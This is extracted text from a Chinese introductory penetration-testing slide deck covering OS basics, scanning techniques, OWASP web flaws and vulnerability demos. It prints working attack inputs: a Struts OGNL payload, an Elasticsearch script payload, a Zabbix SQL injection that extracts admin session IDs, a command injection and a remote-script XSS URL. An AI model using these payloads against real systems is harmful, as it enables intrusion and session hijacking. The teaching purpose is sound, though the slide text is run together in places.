滲透測(cè)試入門實(shí)戰(zhàn)(校訂版)_第1頁
滲透測(cè)試入門實(shí)戰(zhàn)(校訂版)_第2頁
滲透測(cè)試入門實(shí)戰(zhàn)(校訂版)_第3頁
滲透測(cè)試入門實(shí)戰(zhàn)(校訂版)_第4頁
滲透測(cè)試入門實(shí)戰(zhàn)(校訂版)_第5頁
已閱讀5頁,還剩129頁未讀 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

滲透測(cè)試入門主講:

2023/11/7第一章:滲透測(cè)試簡介什么是滲透測(cè)試滲透測(cè)試(PenetrationTesting)

——是為了證明網(wǎng)絡(luò)防御按照預(yù)期計(jì)劃正常運(yùn)行而提供的一種機(jī)制。實(shí)現(xiàn)原理:

依據(jù)

對(duì)已知或未知漏洞測(cè)試、模擬攻擊

目地

重點(diǎn):降低風(fēng)險(xiǎn)、完善目前的安全策略

特點(diǎn)

人工檢測(cè)、工具掃描、可控非破壞什么是滲透測(cè)試滲透測(cè)試流程

滲透測(cè)試滲透測(cè)試工具

BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第二章、

操作系統(tǒng)簡介OS是用戶與硬件系統(tǒng)之間的接口,運(yùn)行在禪機(jī)上管理、調(diào)度計(jì)算機(jī)的各種軟硬件資源擴(kuò)充硬件的功能,為應(yīng)用程序的開發(fā)和運(yùn)行提供高效率的平臺(tái)2.3操作系統(tǒng)簡介2.3.1操作系統(tǒng)功能操作系統(tǒng)——是一組對(duì)計(jì)算機(jī)資源進(jìn)行控制與管理的系統(tǒng)化程序集合,是系統(tǒng)軟件的核心。目的:提高各類資源利用率,并能方便用戶使用,為其他軟件的開發(fā)提供必要的服務(wù)和相應(yīng)的接口。功能:管理計(jì)算機(jī)的所有(硬件和軟件)資源操作系

統(tǒng)設(shè)備管理信息管理內(nèi)存管理處理器管理CPU內(nèi)存外存外設(shè)用戶用戶接口2.3.2操作系統(tǒng)發(fā)展過程單用戶單任務(wù)操作系統(tǒng):如:DOS、CP/M批處理操作系統(tǒng)單道批處理系統(tǒng):單任務(wù)OS。多道批處理系統(tǒng):多任務(wù)OS多個(gè)程序或多個(gè)作業(yè)同時(shí)存在和運(yùn)行分時(shí)操作系統(tǒng)(多用戶、多任務(wù))多個(gè)用戶通過終端共同使用同一臺(tái)計(jì)算機(jī)處理器調(diào)度程序(任務(wù)管理器),采用按時(shí)間片輪轉(zhuǎn)策略,各個(gè)用戶輪流“分時(shí)”共享了CPU如:UNIX是最流行的多用戶、多任務(wù)、分時(shí)操作系統(tǒng),實(shí)時(shí)操作系統(tǒng)及時(shí)、快速對(duì)事件進(jìn)行響應(yīng)和處理化工、煉油等生產(chǎn)過程的自動(dòng)控制;軍事上的武器制導(dǎo);自動(dòng)訂票系統(tǒng)、股票、銀行系統(tǒng)等。網(wǎng)絡(luò)操作系統(tǒng)是指網(wǎng)絡(luò)服務(wù)器上使用的操作系統(tǒng),提供網(wǎng)絡(luò)通訊和網(wǎng)絡(luò)資源共享的操作系統(tǒng)微機(jī)操作系統(tǒng)(通用操作系統(tǒng)):如:Windows、MacOS2.3.3進(jìn)程(任務(wù))進(jìn)程——一個(gè)正在執(zhí)行的程序程序的一次執(zhí)行過程,是操作系統(tǒng)調(diào)度和分配的一個(gè)獨(dú)立單位;一個(gè)程序與其數(shù)據(jù)一道在計(jì)算機(jī)上順利執(zhí)行時(shí)所發(fā)生的活動(dòng)作業(yè)——程序從被選中、到運(yùn)行結(jié)束、并再次成為程序的整個(gè)過程操作系統(tǒng)把進(jìn)程管理歸納為:程序成為作業(yè),進(jìn)而成為進(jìn)程10作業(yè)不都是進(jìn)程,所有進(jìn)程都是作業(yè);作業(yè)進(jìn)入內(nèi)存運(yùn)行就為進(jìn)程,等待運(yùn)行的作業(yè)不是進(jìn)程程序不都是作業(yè),作業(yè)都是程序;程序根據(jù)用戶需要,可以成為作業(yè),也可能不會(huì)。2.3.4線程線程——進(jìn)程的進(jìn)一步細(xì)分單線程:一個(gè)程序只在一個(gè)進(jìn)程就可以處理所有任務(wù)多線程:一個(gè)程序可以分解成多個(gè)進(jìn)程共同完成程序的任務(wù)其中:被分解的不同進(jìn)程稱為線程UNIX操作系統(tǒng)——把進(jìn)程作為CPU的分配單位Windows操作系統(tǒng)——把線程作為CPU的分配單位大部分應(yīng)用程序都采用多線程的結(jié)構(gòu)CPU采用線程作為分配單位的優(yōu)點(diǎn):充分共享資源、減少內(nèi)存開銷提高并發(fā)性、加快切換速度2.3.5常用操作系統(tǒng)簡介11.DOS(MS-DOS):單用戶、單任務(wù)2.WindowsWindows9X、ME、2000、XP、Vista

、Windows7單用戶、多任務(wù)WindowsNT及2000/XPServer多用戶、多任務(wù),網(wǎng)絡(luò)操作系統(tǒng)(局域網(wǎng))3.UINX多用戶、多任務(wù),網(wǎng)絡(luò)操作系統(tǒng)(巨型機(jī)、大型機(jī))使用最廣泛、影響最大的主流OS4.Linux是一種源代碼向世人公開操作系統(tǒng)(自由軟件),多用戶、多任務(wù)、網(wǎng)絡(luò)操作系統(tǒng)可用于:巨型機(jī)、大型機(jī),工作站、個(gè)人計(jì)算機(jī)2.3.5常用操作系統(tǒng)簡介25.OS/21987年IBM公司為PS/2機(jī)配備的OS6.MacOS在蘋果公司的PowerMacintosh機(jī)、Macintosh一族計(jì)算機(jī)使用的OS基于圖形界面、有較強(qiáng)的圖形處理能力,廣泛應(yīng)用于平面出版、多媒體領(lǐng)域與WINDOWS不兼容!7.NovellNetWare一種基于文件服務(wù)、目錄服務(wù)的OS,用于構(gòu)建局域網(wǎng)2.3.6文件系統(tǒng)——計(jì)算機(jī)是以文件的形式組織和存儲(chǔ)數(shù)據(jù)的。常用文件系統(tǒng)Ext2、FAT、FAT32、NTFS文件名構(gòu)成:Windows文件名構(gòu)成:主文件名.擴(kuò)展名Windows文件名不區(qū)分大小寫;Unix文件名區(qū)分大小寫文件名中不能使用的符號(hào)有:<、>、/、\、|、:、”、*、?文件屬性:只讀:文件只能讀取,不能修改隱藏:文件和文件夾是淺色的,一般情況是不顯示的存檔:任何一個(gè)新創(chuàng)建或修改的文件都有存檔屬性文件名中的通配符(英文符號(hào))“?”:表示或代替任意的一個(gè)字符“*”:表示或代替任意的多個(gè)字符Windows支持的文件系統(tǒng)常見擴(kuò)展名見P39通配符用法介紹搜索對(duì)象說明通配符表示第1字符(即首字符)為A的文件A*.*擴(kuò)展名為.EXE的文件*.EXE首字符為B的文本文件B*.TXTWord文檔*.DOCX第3字符為B的PPT文件??B*.PPT所有文件、文件夾*.*搜索欄第三章、密碼學(xué)簡介17信息社會(huì)的發(fā)展與挑戰(zhàn)

人類進(jìn)入信息化社會(huì)時(shí)代。數(shù)字化、信息化、網(wǎng)絡(luò)化正在沖擊、影響、改變我們社會(huì)生活的各個(gè)方面。從科學(xué)研究、生產(chǎn)制造、產(chǎn)品流通、商業(yè)運(yùn)作、超市購物、醫(yī)療服務(wù)、教育培訓(xùn)、出版印刷、媒體傳播,到文化生活、娛樂消閑、人際交往、法律規(guī)范、倫理道德、乃至軍事作戰(zhàn)等等,無一不將受到信息網(wǎng)絡(luò)的挑戰(zhàn),無一不在信息技術(shù)這一最新高科技生產(chǎn)力的作用下迅速變化。18信息社會(huì)的發(fā)展與挑戰(zhàn)信息過量,難以消化;

信息真假,難以辨識(shí);信息形式不一致,難以統(tǒng)一處理;數(shù)據(jù)生產(chǎn)、傳輸能力遠(yuǎn)大于數(shù)據(jù)分析能力;人們被數(shù)據(jù)淹沒,卻饑餓于知識(shí);信息安全,難以保證。

19Internet上的對(duì)抗與威脅信息空間(Cyberspace)中的偵察與反偵察、截獲和反截獲、破譯和反破譯、破壞和反破壞的斗爭(zhēng)愈演愈烈。 軍事上,1991年初的海灣戰(zhàn)爭(zhēng)、2003年伊拉克戰(zhàn)爭(zhēng),實(shí)際上就是信息戰(zhàn)。 商業(yè)上的情報(bào)戰(zhàn)也隨著Internet和Intranet的發(fā)展而步入了新的階段。20Internet上的對(duì)抗與威脅Internet一方面成為人們離不開的信息工具,同時(shí)也成為公開的攻擊對(duì)象目標(biāo)。網(wǎng)絡(luò)的全球性、開放性、無縫連通性、共享性、動(dòng)態(tài)性,使任何人都可以自由地接入Internet,其中有善者,也有惡者。惡意者時(shí)刻在試圖穿透別人的系統(tǒng),搗毀別人的信箱、散布破壞性信息、傾瀉信息拉圾。Internet的安全已受到普遍的重視。21實(shí)例蠕蟲事件1988年12月2日RobertT.Morris向Internet注入Internet蠕蟲,侵犯了Internet中的數(shù)千臺(tái)主機(jī)。捕獲通行字(Passwordsniffing)1994年好多大學(xué)連向Internet,有數(shù)千個(gè)通行字被Sniffing程序捕獲。22實(shí)例序列號(hào)(Sequencenumber)攻擊

1994年底,KevinMitnick發(fā)出的序列號(hào)攻擊,攻破了數(shù)個(gè)計(jì)算中心,其中包括TsutomuShimomura的SanDiego的超導(dǎo)計(jì)算中心。IP惡作劇(Spoofing)、會(huì)話劫持(Sessionhijacking)拒絕服務(wù)(denialofservice)攻擊。e-mail炸彈,pingofdeathTCPSYNflood23實(shí)例利用各種bugs和設(shè)計(jì)局限的攻擊Javaapplets和Activexcontrols提供了攻擊主機(jī)和整個(gè)網(wǎng)站的新的可能緩沖區(qū)溢出攻擊TCP/IP協(xié)議和業(yè)務(wù)本身固有的弱點(diǎn)也關(guān)系到Internet的安全問題其它方面如主機(jī)結(jié)構(gòu),接入控制,管理上的問題。24實(shí)例

安全不是一種可以證明的特性

只能說在某些已知攻擊下是安全的,對(duì)于將來的新的攻擊是否仍安全就很難斷言。如對(duì)密碼分析中的定時(shí)(Timing)攻擊,對(duì)安全存儲(chǔ)秘密鑰的硬件器件進(jìn)行差分故障分析DFA(Differentialfaultanalysis。

第四章、滲透測(cè)試方法2023/11/7基于Web滲透測(cè)試掃描解析輸入Web主機(jī)風(fēng)險(xiǎn)信息收集解析應(yīng)用程序分析應(yīng)用程序,會(huì)話機(jī)制、客戶端控件等SQL、XSS、RFI等測(cè)試代理、配置不當(dāng),中間件等識(shí)別分析與利用HackingOWASPTOP10注入漏洞跨站腳本失效的身份驗(yàn)證和回話管理不安全的直接對(duì)象引用CSRF安全配置錯(cuò)誤不安全的加密存儲(chǔ)沒有限制URL訪問傳輸層保護(hù)不足未驗(yàn)證的重定向和轉(zhuǎn)發(fā)Hacking注入漏洞——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1

and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)Hacking注入漏洞——SQL注入事實(shí)上,對(duì)錯(cuò)誤信息進(jìn)行封裝并不一定能阻止攻擊者的入侵行為,封裝的錯(cuò)誤信息,但是攻擊己經(jīng)形成,有攻擊者能根據(jù)封裝的錯(cuò)誤信息對(duì)攻擊結(jié)果進(jìn)行判斷,繼續(xù)實(shí)施攻擊。其實(shí)盲注就是通過封裝的消息來收集攻擊過程中需要的信息。30Hacking注入漏洞——命令注入POST/aim/synRequest.doHTTP/1.1????method=trace_route&ip=&m=5&w=2|ifconfig31Hacking跨站腳本存儲(chǔ)型反射型DOM型32Hacking跨站腳本原理簡單,利用卻不簡單WEB2.0是XSS的新溫床XSS/CSRFWORM:Samyworm&Sinaweiboworm1、跨站URL:/pub/star/g/xyyyd%22%3E%3Cscript%20src=///images/t.js%3E%3C/script%3E?type=update2、由JS發(fā)起CSRF:

a、發(fā)微博

b、加關(guān)注

c、發(fā)私信AboutSamyWorm:/wiki/Samy_(XSS)http://namb.la/popular/33Hacking任意文件讀取

34Hacking任意文件讀取

35Hacking任意文件讀取

36Hacking任意文件讀取

37Hacking任意文件讀取

38Hacking上傳漏洞——修改參數(shù)39Hacking上傳漏洞——欺騙

40Hacking上傳漏洞——APP客戶端41Hacking認(rèn)證錯(cuò)誤——原始信息的校驗(yàn)方式1、不校驗(yàn)——直接構(gòu)造惡意數(shù)據(jù)修改密碼2、校驗(yàn)COOKIE——CSRFHacking目錄遍歷——移動(dòng)代理服務(wù)器43Hacking錯(cuò)誤信息——“友好”的返回信息44Hacking錯(cuò)誤信息——

HTTPFuzzing對(duì)錯(cuò)誤信息的利用Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別http://site/d477340ffa28755c?OpenDocumenthttp://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocumentHacking參數(shù)錯(cuò)誤——權(quán)限的鑒別http://site/download.asp?file=/path/down_file.rarHacking參數(shù)錯(cuò)誤——權(quán)限的鑒別http://site/download.asp?file=/path/down_file.rarHacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤獲取驗(yàn)證碼為5為純數(shù)字,有效期為30分鐘,可以暴力破解。通過HTTPFUZZING獲得Hacking邏輯錯(cuò)誤Hacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤Hacking邏輯錯(cuò)誤

修改任意賬號(hào)密碼第五章、情報(bào)收集2023/11/7教學(xué)內(nèi)容情報(bào)來源情報(bào)收集收集過程情報(bào)管理情報(bào)來源來源面企業(yè)外部企業(yè)內(nèi)部人際面客戶對(duì)應(yīng)窗口客戶其他窗口主管,其他主管同事,部下資料面客戶訂單或生產(chǎn)計(jì)劃客戶產(chǎn)能調(diào)查或通函客戶銷售計(jì)劃會(huì)議記錄工作聯(lián)絡(luò)單文件數(shù)據(jù)資料活動(dòng)層面生產(chǎn)說明會(huì)檢討會(huì)月生產(chǎn)說明會(huì)內(nèi)部檢討會(huì)交接說明會(huì)情報(bào)收集

技術(shù)部門提供管理部門提供銷售部門提供生產(chǎn)部門提供會(huì)計(jì)部門提供收集過程過程內(nèi)容情報(bào)處理格式轉(zhuǎn)換,記錄,集中,分類,篩選,組合,評(píng)級(jí)情報(bào)分析現(xiàn)狀評(píng)價(jià),未來預(yù)測(cè)情報(bào)擴(kuò)散情報(bào)通訊,情報(bào)分析,專題研究,分享保密情報(bào)管理機(jī)構(gòu)設(shè)置崗位擔(dān)當(dāng)情報(bào)存檔物與情報(bào)流第六章、掃描和枚舉2023/11/72023/11/761信息收集:掃描技術(shù)基于TCP/IP協(xié)議,對(duì)各種網(wǎng)絡(luò)服務(wù),無論是主機(jī)或者防火墻、路由器都適用掃描可以確認(rèn)各種配置的正確性,避免遭受不必要的攻擊用途,雙刃劍安全管理員可以用來確保自己系統(tǒng)的安全性黑客用來探查系統(tǒng)的入侵點(diǎn)端口掃描的技術(shù)已經(jīng)非常成熟,目前有大量的商業(yè)、非商業(yè)的掃描器62掃描器的重要性掃描器能夠暴露網(wǎng)絡(luò)上潛在的脆弱性無論掃描器被管理員利用,或者被黑客利用,都有助于加強(qiáng)系統(tǒng)的安全性它能使得漏洞被及早發(fā)現(xiàn),而漏洞遲早會(huì)被發(fā)現(xiàn)的掃描器可以滿足很多人的好奇心掃描器除了能掃描端口,往往還能夠發(fā)現(xiàn)系統(tǒng)存活情況,以及哪些服務(wù)在運(yùn)行用已知的漏洞測(cè)試這些系統(tǒng)對(duì)一批機(jī)器進(jìn)行測(cè)試,簡單的迭代過程有進(jìn)一步的功能,包括操作系統(tǒng)辨識(shí)、應(yīng)用系統(tǒng)識(shí)別63掃描器歷史早期80年代,網(wǎng)絡(luò)沒有普及,上網(wǎng)的好奇心驅(qū)使許多年輕人通過Modem撥號(hào)進(jìn)入到UNIX系統(tǒng)中。這時(shí)候的手段需要大量的手工操作于是,出現(xiàn)了wardialer——自動(dòng)掃描,并記錄下掃描的結(jié)果現(xiàn)代的掃描器要先進(jìn)得多SATAN:SecurityAdministrator'sToolforAnalyzingNetworks

1995年4月發(fā)布,引起了新聞界的轟動(dòng)界面上的突破,從命令行走向圖形界面(使用HTML界面),不依賴于X兩位作者的影響(DanFarmer寫過網(wǎng)絡(luò)安全檢查工具COPS,另一位WeitseVenema是TCP_Wrapper的作者)Nmap作者為Fyodor,技術(shù)上,是最先進(jìn)的掃描技術(shù)大集成結(jié)合了功能強(qiáng)大的通過棧指紋來識(shí)別操作系統(tǒng)的眾多技術(shù)64掃描技術(shù)主機(jī)掃描:確定在目標(biāo)網(wǎng)絡(luò)上的主機(jī)是否可達(dá),同時(shí)盡可能多映射目標(biāo)網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu),主要利用ICMP數(shù)據(jù)包端口掃描:發(fā)現(xiàn)遠(yuǎn)程主機(jī)開放的端口以及服務(wù)操作系統(tǒng)指紋掃描:根據(jù)協(xié)議棧判別操作系統(tǒng)65傳統(tǒng)主機(jī)掃描技術(shù)ICMPEchoRequest(type8)和EchoReply(type0)通過簡單地向目標(biāo)主機(jī)發(fā)送ICMPEchoRequest數(shù)據(jù)包,并等待回復(fù)的ICMPEchoReply包,如PingICMPSweep(PingSweep)使用ICMPEchoRequest一次探測(cè)多個(gè)目標(biāo)主機(jī)。通常這種探測(cè)包會(huì)并行發(fā)送,以提高探測(cè)效率

BroadcastICMP設(shè)置ICMP請(qǐng)求包的目標(biāo)地址為廣播地址或網(wǎng)絡(luò)地址,則可以探測(cè)廣播域或整個(gè)網(wǎng)絡(luò)范圍內(nèi)的主機(jī),這種情況只適合于UNIX/Linux系統(tǒng)Non-EchoICMP其它ICMP服務(wù)類型(13和14、15和16、17和18)也可以用于對(duì)主機(jī)或網(wǎng)絡(luò)設(shè)備如路由器等的探測(cè)66高級(jí)主機(jī)掃描技術(shù)利用被探測(cè)主機(jī)產(chǎn)生的ICMP錯(cuò)誤報(bào)文來進(jìn)行復(fù)雜的主機(jī)探測(cè)

異常的IP包頭向目標(biāo)主機(jī)發(fā)送包頭錯(cuò)誤的IP包,目標(biāo)主機(jī)或過濾設(shè)備會(huì)反饋ICMPParameterProblemError信息。常見的偽造錯(cuò)誤字段為HeaderLength和IPOptions。不同廠家的路由器和操作系統(tǒng)對(duì)這些錯(cuò)誤的處理方式不同,返回的結(jié)果也不同。在IP頭中設(shè)置無效的字段值向目標(biāo)主機(jī)發(fā)送的IP包中填充錯(cuò)誤的字段值,目標(biāo)主機(jī)或過濾設(shè)備會(huì)反饋ICMPDestinationUnreachable信息。這種方法同樣可以探測(cè)目標(biāo)主機(jī)和網(wǎng)絡(luò)設(shè)備67高級(jí)主機(jī)掃描技術(shù)(續(xù))通過超長包探測(cè)內(nèi)部路由器若構(gòu)造的數(shù)據(jù)包長度超過目標(biāo)系統(tǒng)所在路由器的PMTU且設(shè)置禁止分片標(biāo)志,該路由器會(huì)反饋FragmentationNeededandDon’tFragmentBitwasSet差錯(cuò)報(bào)文。反向映射探測(cè)用于探測(cè)被過濾設(shè)備或防火墻保護(hù)的網(wǎng)絡(luò)和主機(jī)。構(gòu)造可能的內(nèi)部IP地址列表,并向這些地址發(fā)送數(shù)據(jù)包。當(dāng)對(duì)方路由器接收到這些數(shù)據(jù)包時(shí),會(huì)進(jìn)行IP識(shí)別并路由,對(duì)不在其服務(wù)的范圍的IP包發(fā)送ICMPHostUnreachable或ICMPTimeExceeded錯(cuò)誤報(bào)文,沒有接收到相應(yīng)錯(cuò)誤報(bào)文的IP地址可被認(rèn)為在該網(wǎng)絡(luò)中68主機(jī)掃描的對(duì)策使用可以檢測(cè)并記錄ICMP掃描的工具使用入侵檢測(cè)系統(tǒng)在防火墻或路由器中設(shè)置允許進(jìn)出自己網(wǎng)絡(luò)的ICMP分組類型69端口掃描技術(shù)開放掃描(OpenScanning)需要掃描方通過三次握手過程與目標(biāo)主機(jī)建立完整的TCP連接可靠性高,產(chǎn)生大量審計(jì)數(shù)據(jù),容易被發(fā)現(xiàn)半開放掃描(Half-OpenScanning)掃描方不需要打開一個(gè)完全的TCP連接秘密掃描(StealthScanning)不包含標(biāo)準(zhǔn)的TCP三次握手協(xié)議的任何部分

隱蔽性好,但這種掃描使用的數(shù)據(jù)包在通過網(wǎng)絡(luò)時(shí)容易被丟棄從而產(chǎn)生錯(cuò)誤的探測(cè)信息

70端口掃描技術(shù)基本的TCPconnect()掃描(開放)Reverse-ident掃描(開放)TCPSYN掃描(半開放)IPIDheaderaka“dump”掃描(半開放)TCPFin掃描(秘密)TCPXMAS掃描(秘密)TCPftpproxy掃描(bounceattack)用IP分片進(jìn)行SYN/FIN掃描(躲開包過濾防火墻)UDPICMP端口不可達(dá)掃描UDPrecvfrom掃描7172TCPconnect()掃描原理掃描器調(diào)用socket的connect()函數(shù)發(fā)起一個(gè)正常的連接如果端口是打開的,則連接成功否則,連接失敗優(yōu)點(diǎn)簡單,不需要特殊的權(quán)限缺點(diǎn)服務(wù)器可以記錄下客戶的連接行為,如果同一個(gè)客戶輪流對(duì)每一個(gè)端口發(fā)起連接,則一定是在掃描73Reverse-ident掃描Ident協(xié)議(RFC1413)使得可以發(fā)現(xiàn)任何一個(gè)通過TCP連接的進(jìn)程的所有者的用戶名,即使該進(jìn)程并沒有發(fā)起該連接只有在TCP全連接之后才有效TCP端口113例如可以先連接到80端口,然后通過identd來發(fā)現(xiàn)服務(wù)器是否在root下運(yùn)行建議關(guān)閉ident服務(wù),或者在防火墻上禁止,除非是為了審計(jì)的目的74

TCPSYN掃描原理向目標(biāo)主機(jī)的特定端口發(fā)送一個(gè)SYN包如果應(yīng)答包為RST包,則說明該端口是關(guān)閉的否則,會(huì)收到一個(gè)SYN|ACK包。于是,發(fā)送一個(gè)RST,停止建立連接由于連接沒有完全建立,所以稱為“半開連接掃描”優(yōu)點(diǎn)很少有系統(tǒng)會(huì)記錄這樣的行為缺點(diǎn)在UNIX平臺(tái)上,需要root權(quán)限才可以建立這樣的SYN數(shù)據(jù)包75IPIDheaderaka“dump”掃描由Antirez首先使用,并在Bugtraq上公布原理:掃描主機(jī)通過偽造第三方主機(jī)IP地址向目標(biāo)主機(jī)發(fā)起SYN掃描,并通過觀察其IP序列號(hào)的增長規(guī)律獲取端口的狀態(tài)優(yōu)點(diǎn)不直接掃描目標(biāo)主機(jī)也不直接和它進(jìn)行連接,隱蔽性較好缺點(diǎn)對(duì)第三方主機(jī)的要求較高

76TCPFin掃描原理掃描器發(fā)送一個(gè)FIN數(shù)據(jù)包如果端口關(guān)閉的,則遠(yuǎn)程主機(jī)丟棄該包,并送回一個(gè)RST包否則的話,遠(yuǎn)程主機(jī)丟棄該包,不回送變種,組合其他的標(biāo)記優(yōu)點(diǎn)不是TCP建立連接的過程,所以比較隱蔽缺點(diǎn)與SYN掃描類似,也需要構(gòu)造專門的數(shù)據(jù)包在Windows平臺(tái)無效,總是發(fā)送RST包77TCPXMAS掃描原理掃描器發(fā)送的TCP包包頭設(shè)置所有標(biāo)志位關(guān)閉的端口會(huì)響應(yīng)一個(gè)同樣設(shè)置所有標(biāo)志位的包開放的端口則會(huì)忽略該包而不作任何響應(yīng)優(yōu)點(diǎn)比較隱蔽缺點(diǎn)主要用于UNIX/Linux/BSD的TCP/IP的協(xié)議棧不適用于Windows系統(tǒng)78分片掃描它本身并不是一種新的掃描方法,而是其他掃描技術(shù)的變種,特別是SYN掃描和FIN掃描思想是,把TCP包分成很小的分片,從而讓它們能夠通過包過濾防火墻注意,有些防火墻會(huì)丟棄太小的包而有些服務(wù)程序在處理這樣的包的時(shí)候會(huì)出現(xiàn)異常,或者性能下降,或者出現(xiàn)錯(cuò)誤79TCPftpproxy掃描FTPbounceattack原理用PORT命令讓ftpserver與目標(biāo)主機(jī)建立連接,而且目標(biāo)主機(jī)的端口可以指定如果端口打開,則可以傳輸否則,返回"425Can'tbuilddataconnection:Connectionrefused."Ftp這個(gè)缺陷還可以被用來向目標(biāo)(郵件,新聞)傳送匿名信息優(yōu)點(diǎn):這種技術(shù)可以用來穿透防火墻缺點(diǎn):慢,有些ftpserver禁止這種特性80UDPICMP端口不可達(dá)掃描利用UDP協(xié)議(主機(jī)掃描?)原理開放的UDP端口并不需要送回ACK包,而關(guān)閉的端口也不要求送回錯(cuò)誤包,所以利用UDP包進(jìn)行掃描非常困難有些協(xié)議棧實(shí)現(xiàn)的時(shí)候,對(duì)于關(guān)閉的UDP端口,會(huì)送回一個(gè)ICMPPortUnreach錯(cuò)誤缺點(diǎn)速度慢,而且UDP包和ICMP包都不是可靠的需要root權(quán)限,才能讀取ICMPPortUnreach消息一個(gè)應(yīng)用例子Solaris的rpcbind端口(UDP)位于32770之上,這時(shí)可以通過這種技術(shù)來探測(cè)81UDPrecvfrom()&write()掃描非root用戶不能直接讀取ICMPPortUnreach消息,但是Linux提供了一種方法可以間接通知到原理第二次對(duì)一個(gè)關(guān)閉的UDP端口調(diào)用write()總是會(huì)失敗經(jīng)驗(yàn):在ICMP錯(cuò)誤到達(dá)之前,在UDP端口上調(diào)用recvfrom()會(huì)返回EAGAIN(重試),否則會(huì)返回ECONNREFUSED(連接拒絕…)82端口掃描的對(duì)策設(shè)置防火墻過濾規(guī)則,阻止對(duì)端口的掃描例如可以設(shè)置檢測(cè)SYN掃描而忽略FIN掃描使用入侵檢測(cè)系統(tǒng)禁止所有不必要的服務(wù),把自己的暴露程度降到最低Unix或linux中,在/etc/inetd.conf中注釋掉不必要的服務(wù),并在系統(tǒng)啟動(dòng)腳本中禁止其他不必要的服務(wù)Windows中通過Services禁止敏感服務(wù),如IIS第七章、實(shí)施漏洞掃描2023/11/784nmapByFyodor作者研究了諸多掃描器,每一種掃描器都有自己的優(yōu)點(diǎn),它把所有這些技術(shù)集成起來,寫成了nmap源碼開放,C語言兩篇技術(shù)文檔TheArtofPortScanningRemoteOSdetectionviaTCP/IPStackFingerPrinting除了掃描功能,更重要的是,可以識(shí)別操作系統(tǒng),甚至是內(nèi)核的版本85Nmap用于掃描86Nmap用于掃描(續(xù))87X-scan88掃描器SATANSAINTSSSStrobeX-Scan……ISS(安氏)PingerPortscanSuperscan流光第八章、破解密碼2023/11/7常見的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …互聯(lián)網(wǎng)攻防Struts演示如何利用Struts進(jìn)入你的服務(wù)器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}92互聯(lián)網(wǎng)攻防Struts演示93互聯(lián)網(wǎng)攻防Struts演示夢(mèng)網(wǎng)合作自助服務(wù)12590遠(yuǎn)程代碼執(zhí)行94互聯(lián)網(wǎng)攻防HeartbleedOpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta1ofOpenSSL1.0.2等版本95互聯(lián)網(wǎng)攻防SplunkXSS

OpenSSLTLS心跳信息泄漏漏洞未授權(quán)訪問

代碼執(zhí)行96互聯(lián)網(wǎng)攻防Splunk代碼執(zhí)行97互聯(lián)網(wǎng)攻防SAP漏洞演示SAPNetWeaver是基于專業(yè)標(biāo)準(zhǔn)的集成化應(yīng)用平臺(tái),能夠大幅度降低系統(tǒng)整合的復(fù)雜性。其組件包括門戶、應(yīng)用服務(wù)器、商務(wù)智能解決方案以及系統(tǒng)整合和數(shù)據(jù)整合技術(shù)。98互聯(lián)網(wǎng)攻防Hadoop通過hadoop,hbase,hdfs0.2RC版本的管理web端能遠(yuǎn)程執(zhí)行命令,通過該節(jié)點(diǎn)對(duì)集群服務(wù)器進(jìn)行任務(wù)分發(fā)(該是基本功能,當(dāng)然可以進(jìn)行批量提權(quán)l(xiāng)inux主機(jī))滲透進(jìn)hadoop集群。99互聯(lián)網(wǎng)攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22\%22)%2b\%22-\%22%2bSystem.getProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}100互聯(lián)網(wǎng)攻防Zend,ThkphpZendframework讀取任意文件Demo選擇的原因:腳本小子只會(huì)讀取任意文件,高級(jí)黑客能拿來做什么?內(nèi)網(wǎng)端口掃描內(nèi)網(wǎng)服務(wù)器攻擊HTTP攻擊暴力破解101互聯(lián)網(wǎng)攻防Cacti0day如何利用Cacti進(jìn)入你的服務(wù)器0day互聯(lián)網(wǎng)攻防ZabbixZabbix弱口令SQl注入httpmon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)互聯(lián)網(wǎng)攻防Zenoss

互聯(lián)網(wǎng)攻防Hudson創(chuàng)建任務(wù)Buildamaven2projectBuild寫入execwinshellBuildnowhttp://ip:8080/Buildsconsole互聯(lián)網(wǎng)攻防HudsonHiveHQL可以通過transform自定義Hive使用的Map/Reduce腳本,從而調(diào)用shell/python等語言,默認(rèn)皆可用,導(dǎo)致攻擊者可以通過hive接口等相關(guān)操作方式直接獲取服務(wù)器權(quán)限?;ヂ?lián)網(wǎng)攻防Jboss認(rèn)證繞過控制臺(tái)密碼JMXinvokerServlet107LDAP

